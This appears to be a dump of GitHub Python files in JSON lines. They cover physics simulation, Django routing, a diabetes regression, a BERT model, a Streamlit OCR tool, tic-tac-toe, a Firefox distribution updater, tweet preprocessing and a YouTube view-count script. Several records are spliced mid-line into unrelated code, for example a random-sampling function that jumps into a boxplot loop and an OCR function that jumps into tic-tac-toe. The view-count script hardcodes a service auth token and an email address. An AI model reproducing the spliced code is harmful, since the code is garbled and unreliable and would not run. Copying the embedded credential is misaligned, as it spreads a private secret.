+{"seq_id":"14067372746","text":"import numpy as np\nfrom mapping import mapping_3p3um_80nm as mapping\nfrom functions import mapping_functions as mf\nimport importlib\nfrom tqdm import tqdm\n\n# %%\nmapping = importlib.reload(mapping)\nmf = importlib.reload(mf)\n\nscission_matrix = np.load('/Users/fedor/PycharmProjects/MC_simulation/scission_matrix.npy')\nresist_matrix = np.load('/Users/fedor/PycharmProjects/MC_simulation/data/exp_3p3um_80nm/resist_matrix.npy')\nchain_lens = np.load('/Users/fedor/PycharmProjects/MC_simulation/data/exp_3p3um_80nm/chain_lens.npy')\nn_chains = len(chain_lens)\n\nchain_tables = []\nprogress_bar = tqdm(total=n_chains, position=0)\n\nfor n in range(n_chains):\n chain_tables.append(\n np.load('/Users/fedor/PycharmProjects/MC_simulation/data/exp_3p3um_80nm/chain_tables/chain_table_' +\n str(n) + '.npy'))\n progress_bar.update()\n\nresist_shape = mapping.hist_5nm_shape\n\nmf.process_mapping(scission_matrix, resist_matrix, chain_tables)\nzip_length = 1000\nmf.process_depolymerization(resist_matrix, chain_tables, zip_length)\n\n# %%\nfor ct in chain_tables:\n if len(np.where(ct[:, -1] == 10)[0]) > 0:\n break\n","repo_name":"fedorsidorov/MC_simulation","sub_path":"notebooks/tests/test_depolymerization.py","file_name":"test_depolymerization.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"19790845471","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.urls import path\r\n\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('mnnb', views.mnnb, name='mnnb'),\r\n path('post_mnnb', views.post_mnnb, name='post_mnnb'),\r\n \r\n path('lreg', views.lreg, name='lreg'),\r\n path('post_lreg', views.post_lreg, name='post_lreg'),\r\n \r\n path('svm', views.svm, name='svm'),\r\n path('post_svm', views.post_svm, name='post_svm'),\r\n \r\n path('nltk', views.nltk, name='nltk'),\r\n path('post_nltk', views.post_nltk, name='post_nltk'),\r\n]","repo_name":"Siratigui/django-classifiers","sub_path":"spc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"8166890105","text":"import numpy as np \nfrom matplotlib import pyplot as plt \n\ndef epsilon(n, alpha=0.05):\n\treturn np.sqrt(1/(2*n) * np.log(2/alpha))\n\ndef pn(n, p=0.4):\n\tX = [1 if np.random.rand()
=2:\n axes[0][6-indx].boxplot(diabetes_unaltered[col], flierprops=outliers)\n axes[0][6-indx].set_ylabel(col)\n elif indx <=10 and indx>=6:\n axes[1][10-indx].boxplot(diabetes_unaltered[col], flierprops=outliers)\n axes[1][10-indx].set_ylabel(col)\nfig.suptitle(\"Boxplots for Diabetes Features\")\nfig.tight_layout()\nfig.subplots_adjust(top=0.88)\nplt.savefig(f'plots/Boxplots_features')\nplt.clf()\n\n#Scatter Plot\nfig, axes = plt.subplots(1, 1, figsize=(5, 5))\naxes.grid(axis='y', alpha=0.5)\naxes.scatter(diabetes_df[\"tch\"], diabetes_df[\"Target\"], marker=\"1\", color='blue')\naxes.scatter(diabetes_df[\"BP\"], diabetes_df[\"Target\"], marker=\"*\", color='orange')\naxes.scatter(diabetes_df[\"BMI\"], diabetes_df[\"Target\"], marker=\".\", color='green')\naxes.set_title(f'Diabetes comparisons')\naxes.set_ylabel('Diabetes Progression Indicator')\naxes.set_xlabel('Feature Levels')\naxes.legend((\"tch\", \"BP\", \"BMI\"))\nplt.savefig(f'plots/diabetesProgression_to_tch_BP_BMI.png', dpi=300)\nplt.clf()\nplt.close()\n\n#Lasso Regression analysis\n\n#Dummy variable for sex feature\nencoded_sex = pd.get_dummies(diabetes_df['Sex'], drop_first=True)\ndiabetes_df = pd.concat([diabetes_df, encoded_sex], axis=1)\ndiabetes_df.rename(columns = {list(diabetes_df)[11]: \"Encoded Sex\"}, inplace=True)\ndiabetes_df.drop(['Sex'], axis=1, inplace=True)\n\n#Removing outliers based on Z Score\nz = np.abs(stats.zscore(diabetes_df))\ndiabetes_df_o = diabetes_df[(z < 3).all(axis=1)]\nX = diabetes_df_o.loc[:, ['Age', 'BMI', 'BP', 'map', 'tc', 'ldl', 'hdl', 'tch', 'glu', 'Encoded Sex']]\ny = diabetes_df_o['Target']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\nlasso = Lasso()\nlasso.fit(X_train, y_train)\n\nprint(f\"Intercept: {lasso.intercept_}\\n\")\nprint(f\"Coeficients: {lasso.coef_}\\n\")\nprint(f\"Named Coeficients: {pd.DataFrame(lasso.coef_, X.columns)}\")\npd.DataFrame(lasso.coef_, X.columns).to_csv(\"Lasso Coefficients\")\n\npredicted_values = lasso.predict(X_test)\n\nfor (real, predicted) in list(zip(y_test, predicted_values)):\n print(f\"Value: {real:.2f}, pred: {predicted:.2f}, diff: {(real - predicted):.2f}\")\n\nsns.set(palette=\"hls\")\nresiduals = y_test - predicted_values\n\nsns.scatterplot(y_test, predicted_values, marker=\"+\")\nplt.plot([0, 300], [0, 300], '--')\nplt.xlabel('Real Value')\nplt.ylabel('Predicted Value')\nplt.title('Lasso Real Value vs Predicted Values')\nplt.savefig('plots/Lasso_Predicted.png')\nplt.clf()\n\nsns.scatterplot(y_test, residuals, marker=\"s\")\nplt.plot([200, 0], [0, 0], '--')\nplt.xlabel('Real Value')\nplt.ylabel('Residuals')\nplt.title('Lasso Real Value vs Residuals')\nplt.savefig('plots/Lasso_Residuals.png')\nplt.clf()\n\nsns.distplot(residuals, bins=20, kde=False)\nplt.plot([0, 0], [50, 0], '--')\nplt.title('Lasso Residual Distribution')\nplt.savefig('plots/Lasso_Residual_Distn.png')\nplt.clf()\nplt.close()\n\nprint(f\"MAE error(avg abs residual): {metrics.mean_absolute_error(y_test, predicted_values)}\")\nprint(f\"MSE error: {metrics.mean_squared_error(y_test, predicted_values)}\")\nprint(f\"RMSE error: {np.sqrt(metrics.mean_squared_error(y_test, predicted_values))}\")","repo_name":"MarisaAlves/Project_Diabetes","sub_path":"Python_Scripts/Lasso_Regression.py","file_name":"Lasso_Regression.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"12160638878","text":"import torch\nimport torch.nn as nn\nfrom transformers.models.bert.modeling_bert import BertConfig, BertEncoder, BertModel\n\nfrom .model_base.model_embed_base import EmbedLayer\nfrom .model_base.model_mlp import MultiLayerPerceptron\n\n\nclass BidirectionalEncoderRepresentationsfromTransformers(nn.Module):\n \"\"\"\n BERT model\n \"\"\"\n\n def __init__(self, settings):\n \"\"\"\n Initializes BERT Model\n\n Parameters:\n settings(dict): Dictionary containing the settings\n \"\"\"\n\n super().__init__()\n\n # Get settings\n self.embedding_dim = settings[\"bert\"][\"embedding_dim\"]\n self.input_dim = settings[\"bert\"][\"input_dim\"]\n self.label_len_dict = settings[\"label_len_dict\"]\n self.n_layers = settings[\"bert\"][\"n_layers\"]\n self.n_heads = settings[\"bert\"][\"n_heads\"]\n self.dense_layer_dim = settings[\"bert\"][\"dense_layer_dim\"]\n self.non_embed_col = settings[\"non_embedding_columns\"]\n\n # Create embedding layer\n self.embed_layer = EmbedLayer(self.embedding_dim, self.label_len_dict)\n\n # Create input linear layer\n embed_output_dim = self.embed_layer.get_output_dim()\n self.input_lin = nn.Linear(\n embed_output_dim + len(self.non_embed_col), self.input_dim\n )\n\n # Create BERT layer\n self.config = BertConfig(\n 3, # not used\n hidden_size=self.input_dim,\n num_hidden_layers=self.n_layers,\n num_attention_heads=self.n_heads,\n max_position_embeddings=settings[\"bert\"][\"max_seq_len\"],\n )\n\n self.encoder = BertModel(self.config)\n\n # output dense layer\n self.output_lin = MultiLayerPerceptron(self.input_dim, self.dense_layer_dim)\n\n return\n\n def forward(self, x):\n # Get data input size\n input_size = len(x[\"interaction\"])\n\n # Embedding layer\n embedded_x = self.embed_layer(x)\n\n # Combine non-embedding layer\n if len(self.non_embed_col) != 0:\n embedded_x = torch.cat(\n [embedded_x] + [x[i].unsqueeze(2) for i in self.non_embed_col], -1\n )\n\n # Input linear layer\n input_x = self.input_lin(embedded_x)\n\n # BERT layer\n encoded_layers = self.encoder(inputs_embeds=input_x, attention_mask=x[\"mask\"])\n out = encoded_layers[0]\n\n # Dense layer\n out = out.contiguous().view(input_size, -1, self.input_dim)\n out = self.output_lin(out).view(input_size, -1)\n\n return out\n","repo_name":"boostcampaitech5/level2_dkt-recsys-06","sub_path":"code/src/model_folder/model_bert.py","file_name":"model_bert.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"18407870815","text":"#!/usr/bin/python3\n\"\"\"Defines a class Square that inherits from class Rectangle\"\"\"\nRectangle = __import__('9-rectangle').Rectangle\n\n\nclass Square(Rectangle):\n \"\"\"Description for the class Square\"\"\"\n\n def __init__(self, size):\n \"\"\"Initializes instances of the class\"\"\"\n\n super().integer_validator('size', size)\n super().__init__(size, size)\n self.__size = size\n","repo_name":"Beldine-Moturi/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/11-square.py","file_name":"11-square.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"9085939292","text":"import streamlit as st\nfrom PIL import Image, ImageDraw\nimport time\nimport os\nimport requests\nfrom google.cloud import vision\nfrom google.cloud.vision_v1 import types\nfrom google.oauth2 import service_account\nimport json\nimport uuid\nimport io\n\n# import audio\nimport threading\nfrom multiprocessing import Queue\n\nmaikadomain = os.getenv(\"MAIKA_DOMAIN\")\n\n\ncredentials = service_account.Credentials.from_service_account_info(\n dict(st.secrets[\"connection\"][\"gcs\"]), scopes=[\"https://www.googleapis.com/auth/cloud-platform\"]\n)\n\n# def detect_document_text_with_confidence(full_text_annotation, min_confidence=0.9):\n\n# filtered_text_blocks = []\n# for page in full_text_annotation.pages:\n# for block in page.blocks:\n# for paragraph in block.paragraphs:\n# for word in paragraph.words:\n# text = ''.join([symbol.text for symbol in word.symbols])\n# confidence = word.confidence\n# if confidence > min_confidence:\n# filtered_text_blocks.append((text, confidence))\n\n# return filtered_text_blocks\n\n@st.cache_data\ndef get_file_content(image_url):\n response = requests.get(image_url)\n file_content = response.content\n return file_content\n\ndef detect_document_text_with_confidence(full_text_annotation, min_block_conf = 0.0, min_paragraph_conf=0.9, min_word_conf=0.0):\n result=''\n\n for page in full_text_annotation.pages:\n # print(42, page.confidence)\n block_texts = []\n for block in page.blocks:\n if float(block.confidence) < min_block_conf:\n continue\n paragraph_texts = []\n for paragraph in block.paragraphs:\n if float(paragraph.confidence) < min_paragraph_conf: continue\n\n words = []\n # print(48, paragraph.confidence)\n for word in paragraph.words:\n if float(word.confidence) 9:\n raise ValueError(\"User input out of range.\")\n elif board_array[user_input - 1] != Piece.E:\n print(\"Error: This space is not available.\")\n continue\n else:\n position = user_input\n except ValueError:\n print(\"Error: Invalid input.\")\n continue\n\n # Adjust for 0-based index.\n return position - 1\n\ndef user_turn(board_array):\n position = user_choice_prompt(board_array)\n board_array[position] = Piece.X\n\ndef computer_turn(board_array):\n position = random_empty_space_index(board_array)\n board_array[position] = Piece.O\n\ndef get_board_type():\n default = BoardType.NUMBERED\n\n if len(sys.argv) == 2:\n if sys.argv[1] == BoardType.SIMPLE.value:\n return BoardType.SIMPLE\n elif sys.argv[1] == BoardType.NUMBERED.value:\n return BoardType.NUMBERED\n else:\n return default\n else:\n return default\n\n# Main\n\ndef main():\n board_type = get_board_type()\n play_game = True\n while play_game:\n board_array = create_board_array()\n game_is_over = False\n\n print_board(board_type, board_array)\n\n while not game_is_over:\n user_turn(board_array)\n game_is_over = check_for_winner(board_array) or check_for_tie(board_array)\n\n if not game_is_over:\n computer_turn(board_array)\n game_is_over = check_for_winner(board_array) or check_for_tie(board_array)\n\n print_board(board_type, board_array)\n\n if game_is_over:\n check_for_winner(board_array, print_results=True) or check_for_tie(board_array, print_results=True)\n\n print()\n play_again_user_input = input(\"Play again? 
(Y/n) \")\n if play_again_user_input != \"\" and play_again_user_input != \"Y\" and play_again_user_input != \"y\":\n play_game = False\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print()\n print(\"Bye-bye!\")\n quit()","repo_name":"rlziii/Python-Tic-Tac-Toe","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"40755250111","text":"#!/usr/bin/env python\n\nimport argparse\nimport codecs\nimport configparser\nimport datetime\nimport json\nimport os\nimport shutil\nimport zipfile\n\n\nLEGACY_DISTROS = {\n \"baidu\": \"firefox.baidusd\",\n \"baizhu\": \"firefox.dw\",\n \"cumulon\": \"firefox.newhua\",\n \"kingsoft\": \"firefox.kis\",\n \"mainOther\": \"firefox.com.cn\",\n \"mainWinFull\": \"full.firefox.com.cn\",\n \"mainWinStub\": \"stub.firefox.com.cn\",\n \"mainWinStubFallback\": \"firefox.latest\",\n \"mydown\": \"firefox.yesky\",\n \"others\": \"firefox.others\",\n \"qihoo\": \"firefox.3gj\",\n \"tencent\": \"firefox.qm\",\n \"xbsafe\": \"firefox.xbsafe2\",\n \"zol\": \"firefox.zol\"\n}\n\n\ndef update_dist_extension(distro, extensions):\n for ext_id in extensions:\n filename = \"{}.xpi\".format(ext_id)\n\n ext_path = os.path.join(\"..\", distro, \"distribution\",\n \"extensions\", filename)\n if os.path.exists(ext_path):\n print(\"Updating {}\".format(ext_path))\n shutil.copy2(extensions[ext_id], ext_path)\n continue\n\n opt_ext_path = os.path.join(\"..\", distro, \"distribution\",\n \"optional-extensions\", filename)\n if os.path.exists(opt_ext_path):\n print(\"Updating {}\".format(opt_ext_path))\n shutil.copy2(extensions[ext_id], opt_ext_path)\n\n\ndef update_dist_ini(distro, version):\n legacy_distro = LEGACY_DISTROS.get(distro, \"firefox.com.cn\")\n\n cfg = configparser.ConfigParser()\n cfg.optionxform = str\n cfg.read([\n os.path.join(\"templates\", \"distribution.ini\"),\n os.path.join(\"..\", distro, \"dist_addition.ini\")\n ], \"utf-8\")\n\n cfg[\"Global\"][\"version\"] = version\n cfg[\"Preferences\"][\"app.distributor.channel\"] = json.dumps(distro)\n cfg[\"Preferences\"][\"app.partner.{}\".format(distro)] = json.dumps(distro)\n cfg[\"Preferences\"][\"app.chinaedition.channel\"] = json.dumps(legacy_distro)\n\n dist_ini_path = os.path.join(\"..\", distro,\n \"distribution\", \"distribution.ini\")\n print(\"Updating {}\".format(dist_ini_path))\n with codecs.open(dist_ini_path, \"wb\", \"utf-8\") as dist_ini:\n cfg.write(dist_ini, space_around_delimiters=False)\n\n\ndef update_extension(args):\n extensions = {}\n\n if args.ext:\n exts = args.ext\n else:\n ext_dir = os.path.join(\"templates\", \"extensions\")\n exts = [os.path.join(ext_dir, ext_name)\n for ext_name in os.listdir(ext_dir)\n if ext_name.endswith(\".xpi\")]\n\n for ext in exts:\n with zipfile.ZipFile(ext) as ext_file:\n try:\n manifest_file = ext_file.open(\"manifest.json\")\n except KeyError:\n manifest_file = ext_file.open(\"webextension/manifest.json\")\n manifest = json.loads(manifest_file.read().decode(\"utf-8\"))\n manifest_file.close()\n\n ext_id = manifest.get(\"applications\", {}).get(\"gecko\", {}).get(\"id\")\n if not ext_id:\n print(\"id not found for extension: {}\".format(ext))\n continue\n\n extensions[ext_id] = ext\n\n for distro in os.listdir(\"..\"):\n if not os.path.exists(os.path.join(\"..\", distro, \"repack.cfg\")):\n continue\n\n update_dist_extension(distro, extensions)\n\n\n\ndef update_ini(args):\n for distro in os.listdir(\"..\"):\n if not os.path.exists(os.path.join(\"..\", distro, \"repack.cfg\")):\n continue\n\n update_dist_ini(distro, \"{}.{}\".format(args.year, args.month))\n\n\ndef main():\n today = datetime.date.today()\n\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(\n description='subcommands to update parts of the each distribution',\n help='run each subcommand to see more details')\n\n ini_parser = subparsers.add_parser('ini')\n 
ini_parser.add_argument(\"-y\", \"--year\", default=today.year, type=int,\n help=\"set year part of distribution version\", metavar=\"YYYY\")\n ini_parser.add_argument(\"-m\", \"--month\", default=today.month, type=int,\n help=\"set month part of distribution version\", metavar=\"MM\")\n ini_parser.set_defaults(func=update_ini)\n\n ext_parser = subparsers.add_parser('extension')\n ext_parser.add_argument(\"-e\", \"--ext\", nargs='+',\n help=\"the extension file(s) to copy into each distribution\",\n metavar=\"ext.xpi\")\n ext_parser.set_defaults(func=update_extension)\n\n args = parser.parse_args()\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mozilla-partners/mozillaonline","sub_path":"desktop/scripts/update-dist.py","file_name":"update-dist.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"74016025490","text":"# number of words, chars, word freq., sentence freq. audio len\n\nimport sys\nimport re\n\npattern = re.compile('[\\W_]+', re.UNICODE)\n\ntext_path = sys.argv[1] #/home/danni/workspace/data/cv/clean_validated/text'\n#'/home/danni/workspace/data/how2/data/orig/how2-300h-v1/data/train/text.id.en'\n\nword_dict = dict()\nsent_dict = dict()\n\nwith open(text_path, 'r') as f:\n for line in f.readlines():\n words = [pattern.sub('', i.strip()) for i in line.strip().lower().split(' ')[1:]]\n for word in words:\n if word not in word_dict:\n word_dict[word] = 1\n else:\n word_dict[word] += 1\n sent = ' '.join(words)\n if sent not in sent_dict:\n sent_dict[sent] = 1\n else:\n sent_dict[sent] += 1\n\nprint('Vocab size:', len(word_dict))\nprint('Vocab count:')\nfor tup in sorted(word_dict.items(), key=lambda kv: kv[1], reverse=True)[:100]:\n print(tup)\n\nprint('Sent size:', len(sent_dict))\nprint('Sent count:')\nfor tup in sorted(sent_dict.items(), key=lambda kv: kv[1], reverse=True)[:100]:\n print(tup)\n","repo_name":"dannigt/NMTGMinor.lowLatency","sub_path":"smalltools/corpus_stats.py","file_name":"corpus_stats.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"}
+{"seq_id":"40033945579","text":"'''\n\n explore.py\n\n Description: This file contains functions used for producing visualizations\n and conducting statistical tests in the final report notebook.\n\n Variables:\n\n None\n\n Functions:\n\n plot_target_distribution(df)\n plot_most_frequent_words(df)\n plot_contains_keywords(df)\n plot_bigrams(df)\n plot_readme_size_vs_language(df, group_column = 'language')\n one_sample_ttest(df, sample, column, alternative = 'two-sided')\n\n'''\n\n################################################################################\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats\n\nimport nltk\n\nfrom wordcloud import WordCloud\n\n################################################################################\n\ndef plot_target_distribution(df: pd.DataFrame) -> None:\n '''\n Create a plot of the distribution of the target variable \"language\".\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n '''\n\n plt.figure(figsize = (14, 4))\n sns.histplot(data = df, x = 'language')\n\n plt.title('The main programming language for most repositories is not in the top 3 (Python, C++, JavaScript)')\n plt.xlabel('Programming Language')\n \n plt.show()\n\n################################################################################\n\ndef plot_most_frequent_words(df: pd.DataFrame) -> None:\n '''\n Create plots displaying the most frequent words for each programming \n language.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing natural language data. The data should \n ideally be prepared.\n '''\n\n # Show the top 5 most frequent words.\n n = 5\n fig, ax = plt.subplots(ncols = 1, nrows = 3, figsize = (14, 8))\n\n # Get the top 20 most frequent words across all repos.\n clean_words = ' '.join(readme for readme in df.clean)\n clean_words_freq = pd.Series(clean_words.split()).value_counts().head(20)\n\n # Combine all words for each programming language into single strings.\n python_words = ' '.join(text for text in df[df.language == 'Python'].clean)\n cpp_words = ' '.join(text for text in df[df.language == 'C++'].clean)\n javascript_words = ' '.join(text for text in df[df.language == 'JavaScript'].clean).replace(' ', '')\n\n # Remove the top 20 most frequent words across all repos for each group.\n python_words = ' '.join(word for word in python_words.split() if word not in clean_words_freq)\n cpp_words = ' '.join(word for word in cpp_words.split() if word not in clean_words_freq)\n javascript_words = ' '.join(word for word in javascript_words.split() if word not in clean_words_freq)\n\n # Create plots for the most frequent words for each programming language\n\n python_words_freq = pd.Series(python_words.split())\n python_words_freq.value_counts().head(n).plot.barh(ax = ax[0])\n ax[0].set_title('Most Frequent Words in Python Repository READMEs')\n ax[0].set_xlabel('Word Count')\n ax[0].set_ylabel('Words')\n\n cpp_words_freq = pd.Series(cpp_words.split())\n cpp_words_freq.value_counts().head(n).plot.barh(ax = ax[1])\n ax[1].set_title('Most Frequent Words in C++ Repository READMEs')\n ax[1].set_xlabel('Word Count')\n ax[1].set_ylabel('Words')\n\n javascript_words_freq = pd.Series(javascript_words.split())\n javascript_words_freq.value_counts().head(n).plot.barh(ax = ax[2])\n ax[2].set_title('Most Frequent Words in JavaScript Repository READMEs')\n ax[2].set_xlabel('Word Count')\n ax[2].set_ylabel('Words')\n\n plt.tight_layout()\n\n 
plt.show()\n\n################################################################################\n\ndef plot_contains_keywords(df: pd.DataFrame) -> None:\n '''\n Plot a distribution of the contains_keywords features for each \n programming language.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n '''\n\n fig, ax = plt.subplots(ncols = 3, nrows = 1, figsize = (14, 4))\n\n sns.histplot(data = df[df.language == 'Python'], x = 'contains_python_keywords', ax = ax[0])\n ax[0].set_title('Python Repositories')\n ax[0].set_xlabel('Contains Python Keywords')\n\n sns.histplot(data = df[df.language == 'C++'], x = 'contains_cpp_keywords', ax = ax[1])\n ax[1].set_title('C++ Repositories')\n ax[1].set_xlabel('Contains C++ Keywords')\n\n sns.histplot(data = df[df.language == 'JavaScript'], x = 'contains_js_keywords', ax = ax[2])\n ax[2].set_title('JavaScript Repositories')\n ax[2].set_xlabel('Contains JavaScript Keywords')\n\n plt.show()\n\n################################################################################\n\ndef plot_bigrams(df: pd.DataFrame) -> None:\n '''\n Create plots displaying the most common bi-grams for each programming \n language.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n '''\n\n fig, ax = plt.subplots(ncols = 1, nrows = 3, figsize = (14, 8))\n\n python_clean_words = ' '.join(readme for readme in df[df.language == 'Python'].clean)\n cpp_clean_words = ' '.join(readme for readme in df[df.language == 'C++'].clean)\n javascript_clean_words = ' '.join(readme for readme in df[df.language == 'JavaScript'].clean).replace(' ', '')\n\n python_bigrams = pd.Series(nltk.bigrams(python_clean_words.split()))\n python_bigrams.value_counts().head(5).plot.barh(ax = ax[0])\n ax[0].set_title('Most common bi-grams for Python repositories')\n ax[0].set_xlabel('Count')\n ax[0].set_ylabel('Bi-Gram')\n\n cpp_bigrams = pd.Series(nltk.bigrams(cpp_clean_words.split()))\n cpp_bigrams.value_counts().head(5).plot.barh(ax = ax[1])\n ax[1].set_title('Most common bi-grams for C++ repositories')\n ax[1].set_xlabel('Count')\n ax[1].set_ylabel('Bi-Gram')\n\n javascript_bigrams = pd.Series(nltk.bigrams(javascript_clean_words.split()))\n javascript_bigrams.value_counts().head(5).plot.barh(ax = ax[2])\n ax[2].set_title('Most common bi-grams for JavaScript repositories')\n ax[2].set_xlabel('Count')\n ax[2].set_ylabel('Bi-Gram')\n\n plt.tight_layout()\n\n plt.show()\n\n################################################################################\n\ndef plot_readme_size_vs_language(df: pd.DataFrame, group_column: str = 'language') -> None:\n '''\n Create a plot that shows the average readme size grouping by the \n group_column parameter. 
By default this will show the average readme \n size for each programming language in the target variable.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n\n group_column: str, optional\n The column to group the data by.\n '''\n\n plt.figure(figsize = (14, 4))\n\n df.groupby(group_column).readme_size.mean().plot.barh()\n plt.title('Average README file size by programming language')\n\n plt.xlabel('Average Character Count')\n plt.ylabel('Programming Language')\n\n plt.show()\n\n################################################################################\n\ndef one_sample_ttest(df: pd.DataFrame, sample: pd.DataFrame, column: str, alternative: str = 'two-sided') -> None:\n '''\n Conduct a one sample t-test using the provided dataframe and sample \n dataframe. The hypothesis is tested on the column parameter. By \n default a two sided t-test is conducted.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the full population of the data.\n\n sample: DataFrame\n A pandas dataframe containing the sample that is being tested.\n\n column: str\n The feature in the data that will be tested.\n\n alternative: str, optional\n The type of t-test to perform. The default is a two-sided t-test.\n '''\n\n alpha = 0.05\n\n t, p = stats.ttest_1samp(sample[column], df[column].mean(), alternative = alternative)\n\n if p < alpha:\n print('Fail to reject H0')\n else:\n print('Reject H0')","repo_name":"Garcia-Hensley-Nichols-NLP-project/GHN-NLP-project","sub_path":"explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":8230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"8614083840","text":"# Built from code from: https://www.pluralsight.com/guides/building-a-twitter-sentiment-analysis-in-python\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport string\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import wordpunct_tokenize\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom nltk.stem import PorterStemmer\r\nfrom nltk.stem import LancasterStemmer\r\nfrom nltk.stem.util import prefix_replace\r\nfrom nltk.stem.util import suffix_replace\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport nltk\r\n# run first time\r\n# nltk.download('stopwords')\r\n# nltk.download('punkt')\r\n# nltk.download('wordnet')\r\n# nltk.download('omw-1.4')\r\n\r\n# Read in file\r\ndf = pd.read_excel(\"Sample Tweets.xlsx\", sheet_name = 'Ratings').drop(columns = ['Unnamed: 0'])\r\n\r\n# count CAPITAL words, excluding I and A - does include positions and acronyms though\r\ndf['capitals'] = [len(re.findall(r'\\b[A-Z]+\\b(?\\?@\\[\\\\\\]\\^_`{\\|}~]\",' ', new_tweet)\r\n \r\n # Replace abreviations that require numbers\r\n new_tweet = new_tweet.replace(' s ', ' safety ') # as in S and not 80s, 90s, etc.\r\n new_tweet = new_tweet.replace(' b4 ', ' before ')\r\n \r\n # Remove all numbers\r\n new_tweet = re.sub(r'\\d', '', new_tweet)\r\n \r\n # Replace abreviations with punctuation and numbers gone\r\n for old, new in abr_dict.items():\r\n new_tweet = new_tweet.replace(old, new)\r\n\r\n tweet_tokens = wordpunct_tokenize(new_tweet) # separates words and punctuation and spellchecks (sometimes)\r\n \r\n # Remove emojis and weird (non-english alphabet) characters\r\n demoji = [w.encode('ascii', 'ignore').decode('ascii') for w in tweet_tokens]\r\n # Remove stop words\r\n filtered_words = [w for w in demoji if not w in stop_words]\r\n\r\n # stemm\r\n ps = PorterStemmer() # removes suffixes - makes it look very strange and unreadable, including proper nouns\r\n # ls = LancasterStemmer() # more aggressive suffix removal\r\n stemmed_words = [ps.stem(w) for w in filtered_words]\r\n # stemmed_words = [ls.stem(w) for w in filtered_words]\r\n \r\n # lemmatize\r\n lemmatizer = WordNetLemmatizer()\r\n lemma_words = [lemmatizer.lemmatize(w, pos='v') for w in stemmed_words] # changes verbs to same tense\r\n \r\n # Remove single letters left (d and c from d.c., s from 80s, etc.)\r\n final_words = [w for w in lemma_words if len(w) > 1]\r\n # join words again\r\n final_tweet = \" \".join(final_words)\r\n # Remove extra whitespace\r\n # final_tweet = \" \".join(final_tweet.split())\r\n\r\n \r\n return final_tweet\r\n\r\n# Preprocess data\r\ndf.text = df['text'].apply(preprocess_tweet_text)\r\n\r\ndf.rename(columns = {'Sentiment Rating' : 'sentiment'}, inplace = True)\r\ndf.to_csv(\"preprocessed_tweets.csv\")\r\n","repo_name":"sarah2wise/nfl_twitter_prediction","sub_path":"Preprocessing_Text.py","file_name":"Preprocessing_Text.py","file_ext":"py","file_size_in_byte":9672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"24491746906","text":"import concurrent.futures\r\nimport BlynkLib\r\nimport sys\r\nimport time \r\nimport requests\r\nimport random\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\nif sys.version_info[0] > 2:\r\n\tfrom http.cookiejar import LWPCookieJar\r\n\tfrom urllib.request import Request, urlopen\r\n\tfrom urllib.parse import quote_plus, urlparse, parse_qs\r\nelse:\r\n\tfrom cookielib import LWPCookieJar\r\n\tfrom urllib import quote_plus\r\n\tfrom urllib2 import Request, urlopen\r\n\tfrom urlparse import urlparse, parse_qs\r\n\r\n\r\n_URL = 'https://www.youtube.com/watch?v=NrzLnl3tH0U?autoplay=1'\r\n_MAIL = 'thuykieulk1999@gmail.com'\r\n_VIEW = 0\r\n\r\nblynk = BlynkLib.Blynk(token = 'e80ff069a180413cb357e059bb0a1568' , server = 'blynk.getblocky.com')\r\nimport _thread\r\n_thread.start_new_thread(blynk.run,())\r\n\r\nwhile blynk.state != BlynkLib.AUTHENTICATED:\r\n pass\r\n\r\ndef _viewCount():\r\n html = requests.get(_URL).text.split('\\n')\r\n for x in html :\r\n if 'watch-view-count' in x :\r\n viewCount = int(x[116:].split(' ')[0])\r\n return viewCount\r\n return None\r\n\r\ndef _viewCheckRoutine():\r\n while True :\r\n time.sleep(10)\r\n currentCount = _viewCount()\r\n if currentCount != _VIEW :\r\n currentCount = _VIEW\r\n blynk.email(_MAIL , \"Youtube View\" , 